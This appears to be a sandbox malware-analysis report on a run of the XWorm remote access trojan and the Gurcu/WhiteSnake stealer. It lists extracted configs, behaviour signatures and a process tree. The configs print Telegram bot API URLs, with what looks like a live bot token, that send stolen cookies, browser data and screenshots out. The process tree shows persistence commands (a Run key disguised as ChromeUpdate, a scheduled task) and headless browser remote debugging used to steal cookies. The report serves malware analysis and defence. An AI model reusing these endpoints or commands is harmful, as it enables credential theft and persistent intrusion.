Resubmissions

09/03/2025, 18:14

250309-wvp25axvd1 10

09/03/2025, 15:53

250309-tb268svky7 8

08/03/2025, 20:22

250308-y5pv8asjy3 8

08/03/2025, 17:38

250308-v7ydlazrt9 9

07/03/2025, 15:40

250307-s4f9ssswaz 10

07/03/2025, 13:18

250307-qj13cszzgz 3

06/03/2025, 15:59

250306-tfgfbssrs2 4

06/03/2025, 15:19

250306-sqa6mask16 8

05/03/2025, 14:43

250305-r3nf2s1tdt 8

05/03/2025, 14:28

250305-rtcm7a1ms4 8

Analysis

  • max time kernel
    734s
  • max time network
    735s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    02/02/2025, 09:07

General

  • Target

    test.txt

  • Size

    18B

  • MD5

    5b3f97d48c8751bd031b7ea53545bdb6

  • SHA1

    88be3374c62f23406ec83bb11279f8423bd3f88d

  • SHA256

    d8fce9dd9c65ca143343f7711859a7cffc3c5e656a8b84108183fb769a12ed8b

  • SHA512

    ed2de1eec50310ced4bde8ef6ae4b7902920b007df7b6aeb200cfe9fcc0d36ef05af7526c4675be2feac52831668798d5fe3523175efad6f6549b30f30a0b5d6

Malware Config

Extracted

Family

xworm

C2

127.0.0.1:7000

Mutex

kl2gNShVinepnLCw

Attributes
  • install_file

    USB.exe

aes.plain

Extracted

Family

gurcu

C2

https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendDocument?chat_id=-1002258988684&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.38%20kb)%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%84%20-%20BrowserDownloads.txt%20(0.21%20kb

https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendMessage?chat_id=-1002258988684

https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/getUpdates?offset=-

https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendDocument?chat_id=-1002258988684&caption=%F0%9F%93%B8Screenshot%20take

https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendDocument?chat_id=-1002258988684&caption=%F0%9F%A5%A0Cookies%20from%20these%20websites%20%5Bgithub.com%5D%20were%20successfully%20grabbe

Signatures

  • Detect Xworm Payload 3 IoCs
  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu aka WhiteSnake is a malware stealer written in C#.

  • UAC bypass 3 TTPs 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Disables RegEdit via registry modification 1 IoCs
  • Disables Task Manager via registry modification
  • Uses browser remote debugging 2 TTPs 3 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 15 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Uses the VBS compiler for execution 1 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 12 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 57 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • NTFS ADS 3 IoCs
  • Opens file in notepad (likely ransom note) 4 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\test.txt
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4956
    • C:\Windows\system32\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\test.txt
      2⤵
      • Opens file in notepad (likely ransom note)
      PID:2852
  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe"
    1⤵
    • Drops file in Windows directory
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3884
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xe4,0x108,0x7ff9e3b6cc40,0x7ff9e3b6cc4c,0x7ff9e3b6cc58
      2⤵
        PID:276
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1808,i,3512516102527043933,9917919961926476333,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1804 /prefetch:2
        2⤵
          PID:2584
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2096,i,3512516102527043933,9917919961926476333,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2100 /prefetch:3
          2⤵
            PID:3396
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2172,i,3512516102527043933,9917919961926476333,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2208 /prefetch:8
            2⤵
              PID:4304
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3204,i,3512516102527043933,9917919961926476333,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3192 /prefetch:1
              2⤵
                PID:4948
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3220,i,3512516102527043933,9917919961926476333,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3364 /prefetch:1
                2⤵
                  PID:4072
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3552,i,3512516102527043933,9917919961926476333,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4308 /prefetch:1
                  2⤵
                    PID:4244
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4948,i,3512516102527043933,9917919961926476333,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4864 /prefetch:1
                    2⤵
                      PID:4672
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3336,i,3512516102527043933,9917919961926476333,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5076 /prefetch:8
                      2⤵
                        PID:4768
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5100,i,3512516102527043933,9917919961926476333,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4936 /prefetch:8
                        2⤵
                          PID:704
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3380,i,3512516102527043933,9917919961926476333,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4684 /prefetch:8
                          2⤵
                            PID:5088
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5172,i,3512516102527043933,9917919961926476333,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4332 /prefetch:8
                            2⤵
                            • NTFS ADS
                            PID:4308
                        • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                          "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                          1⤵
                            PID:2056
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                            1⤵
                              PID:2500
                            • C:\Windows\System32\rundll32.exe
                              C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                              1⤵
                                PID:3064
                              • C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\XWorm RAT V2.1.exe
                                "C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"
                                1⤵
                                • System Location Discovery: System Language Discovery
                                • NTFS ADS
                                PID:1116
                                • C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\Command Reciever.exe
                                  "C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\Command Reciever.exe"
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  • Checks processor information in registry
                                  • Modifies registry class
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious behavior: GetForegroundWindowSpam
                                  • Suspicious use of FindShellTrayWindow
                                  • Suspicious use of SendNotifyMessage
                                  • Suspicious use of SetWindowsHookEx
                                  PID:4240
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\0oxobg2n\0oxobg2n.cmdline"
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3136
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB82B.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA8D3B265ADDE41558B7BD1AEBDBAFFB7.TMP"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4468
                                • C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe
                                  "C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • NTFS ADS
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:560
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpAC48.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpAC48.tmp.bat
                                    3⤵
                                      PID:3152
                                      • C:\Windows\system32\chcp.com
                                        chcp 65001
                                        4⤵
                                          PID:3560
                                        • C:\Windows\system32\tasklist.exe
                                          Tasklist /fi "PID eq 560"
                                          4⤵
                                          • Enumerates processes with tasklist
                                          PID:1760
                                        • C:\Windows\system32\find.exe
                                          find ":"
                                          4⤵
                                            PID:2504
                                          • C:\Windows\system32\timeout.exe
                                            Timeout /T 1 /Nobreak
                                            4⤵
                                            • Delays execution with timeout.exe
                                            PID:4032
                                          • C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe
                                            "C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe"
                                            4⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Checks processor information in registry
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious behavior: GetForegroundWindowSpam
                                            • Suspicious use of SetWindowsHookEx
                                            PID:1508
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe /f
                                              5⤵
                                                PID:1892
                                                • C:\Windows\system32\reg.exe
                                                  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe /f
                                                  6⤵
                                                  • Adds Run key to start application
                                                  • Modifies registry key
                                                  PID:3428
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --headless --no-sandbox --disable-gpu
                                                5⤵
                                                • Uses browser remote debugging
                                                PID:3116
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x130,0x134,0x138,0x10c,0x13c,0x7ff9cb253cb8,0x7ff9cb253cc8,0x7ff9cb253cd8
                                                  6⤵
                                                    PID:3264
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1460,12915631562615567458,10027608410207997144,131072 --no-sandbox --headless --headless --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --override-use-software-gl-for-tests --mojo-platform-channel-handle=1480 /prefetch:2
                                                    6⤵
                                                    • Modifies registry class
                                                    PID:4092
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1460,12915631562615567458,10027608410207997144,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --use-gl=swiftshader-webgl --headless --mojo-platform-channel-handle=1624 /prefetch:3
                                                    6⤵
                                                      PID:3592
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --allow-pre-commit-input --field-trial-handle=1460,12915631562615567458,10027608410207997144,131072 --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1864 /prefetch:1
                                                      6⤵
                                                      • Uses browser remote debugging
                                                      PID:1532
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --allow-pre-commit-input --field-trial-handle=1460,12915631562615567458,10027608410207997144,131072 --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2144 /prefetch:1
                                                      6⤵
                                                      • Uses browser remote debugging
                                                      PID:648
                                          • C:\Windows\system32\wbem\WmiApSrv.exe
                                            C:\Windows\system32\wbem\WmiApSrv.exe
                                            1⤵
                                              PID:3136
                                            • C:\Users\Admin\Desktop\XWorm.exe
                                              "C:\Users\Admin\Desktop\XWorm.exe"
                                              1⤵
                                              • UAC bypass
                                              • Disables RegEdit via registry modification
                                              • Drops startup file
                                              • Executes dropped EXE
                                              • Adds Run key to start application
                                              • Checks whether UAC is enabled
                                              • Modifies registry class
                                              • System policy modification
                                              PID:4796
                                              • C:\Windows\System32\schtasks.exe
                                                "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "XWorm" /tr "C:\Users\Admin\AppData\Roaming\XWorm.exe"
                                                2⤵
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:4908
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.com/
                                                2⤵
                                                • Enumerates system info in registry
                                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                • Suspicious use of FindShellTrayWindow
                                                • Suspicious use of SendNotifyMessage
                                                PID:1892
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff9cb253cb8,0x7ff9cb253cc8,0x7ff9cb253cd8
                                                  3⤵
                                                    PID:488
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,9862978980118725901,10287226036666592885,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1940 /prefetch:2
                                                    3⤵
                                                      PID:4720
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1928,9862978980118725901,10287226036666592885,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 /prefetch:3
                                                      3⤵
                                                        PID:4304
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1928,9862978980118725901,10287226036666592885,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2768 /prefetch:8
                                                        3⤵
                                                          PID:2068
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,9862978980118725901,10287226036666592885,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
                                                          3⤵
                                                            PID:4064
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,9862978980118725901,10287226036666592885,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
                                                            3⤵
                                                              PID:3960
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1928,9862978980118725901,10287226036666592885,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3620 /prefetch:8
                                                              3⤵
                                                                PID:2916
                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                              cmd.exe /c calc
                                                              2⤵
                                                                PID:1452
                                                                • C:\Windows\system32\calc.exe
                                                                  calc
                                                                  3⤵
                                                                  • Modifies registry class
                                                                  PID:4396
                                                              • C:\Windows\SYSTEM32\taskkill.exe
                                                                "taskkill.exe" /pid 0 /f
                                                                2⤵
                                                                • Kills process with taskkill
                                                                PID:4304
                                                              • C:\Windows\SYSTEM32\CMD.EXE
                                                                "CMD.EXE"
                                                                2⤵
                                                                  PID:696
                                                                  • C:\Windows\system32\whoami.exe
                                                                    whoami
                                                                    3⤵
                                                                      PID:3068
                                                                  • C:\Windows\System32\schtasks.exe
                                                                    "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "XWorm" /tr "C:\Users\Admin\AppData\Roaming\XWorm.exe"
                                                                    2⤵
                                                                    • Scheduled Task/Job: Scheduled Task
                                                                    PID:956
                                                                • C:\Users\Admin\AppData\Roaming\XWorm.exe
                                                                  C:\Users\Admin\AppData\Roaming\XWorm.exe
                                                                  1⤵
                                                                  • Executes dropped EXE
                                                                  PID:1444
                                                                • C:\Windows\system32\AUDIODG.EXE
                                                                  C:\Windows\system32\AUDIODG.EXE 0x000000000000047C 0x000000000000048C
                                                                  1⤵
                                                                    PID:3756
                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                    1⤵
                                                                      PID:3136
                                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                      1⤵
                                                                        PID:868
                                                                      • C:\Windows\system32\OpenWith.exe
                                                                        C:\Windows\system32\OpenWith.exe -Embedding
                                                                        1⤵
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:832
                                                                      • C:\Windows\System32\Taskmgr.exe
                                                                        "C:\Windows\System32\Taskmgr.exe"
                                                                        1⤵
                                                                        • Checks SCSI registry key(s)
                                                                        • Suspicious use of SendNotifyMessage
                                                                        PID:3744
                                                                      • C:\Users\Admin\AppData\Roaming\XWorm.exe
                                                                        C:\Users\Admin\AppData\Roaming\XWorm.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        PID:4308
                                                                      • C:\Windows\System32\Taskmgr.exe
                                                                        "C:\Windows\System32\Taskmgr.exe"
                                                                        1⤵
                                                                        • Checks SCSI registry key(s)
                                                                        PID:3400
                                                                      • C:\Windows\System32\Taskmgr.exe
                                                                        "C:\Windows\System32\Taskmgr.exe"
                                                                        1⤵
                                                                          PID:3196
                                                                        • C:\Users\Admin\AppData\Roaming\XWorm.exe
                                                                          C:\Users\Admin\AppData\Roaming\XWorm.exe
                                                                          1⤵
                                                                          • Executes dropped EXE
                                                                          PID:724
                                                                        • C:\Users\Admin\AppData\Roaming\XWorm.exe
                                                                          C:\Users\Admin\AppData\Roaming\XWorm.exe
                                                                          1⤵
                                                                          • Executes dropped EXE
                                                                          PID:4956
                                                                        • C:\Users\Admin\AppData\Roaming\XWorm.exe
                                                                          C:\Users\Admin\AppData\Roaming\XWorm.exe
                                                                          1⤵
                                                                          • Executes dropped EXE
                                                                          PID:3064
                                                                        • C:\Windows\system32\NOTEPAD.EXE
                                                                          "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\doc.txt
                                                                          1⤵
                                                                          • Opens file in notepad (likely ransom note)
                                                                          PID:1144
                                                                        • C:\Windows\system32\OpenWith.exe
                                                                          C:\Windows\system32\OpenWith.exe -Embedding
                                                                          1⤵
                                                                          • Modifies registry class
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:3180
                                                                        • C:\Users\Admin\AppData\Roaming\XWorm.exe
                                                                          C:\Users\Admin\AppData\Roaming\XWorm.exe
                                                                          1⤵
                                                                          • Executes dropped EXE
                                                                          PID:2600
                                                                        • C:\Windows\system32\NOTEPAD.EXE
                                                                          "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\test.txt
                                                                          1⤵
                                                                          • Opens file in notepad (likely ransom note)
                                                                          PID:1176
                                                                        • C:\Windows\system32\NOTEPAD.EXE
                                                                          "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\test.txt
                                                                          1⤵
                                                                          • Opens file in notepad (likely ransom note)
                                                                          PID:3280
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                          1⤵
                                                                          • Drops file in Windows directory
                                                                          • Enumerates system info in registry
                                                                          • Modifies data under HKEY_USERS
                                                                          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                          PID:2428
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
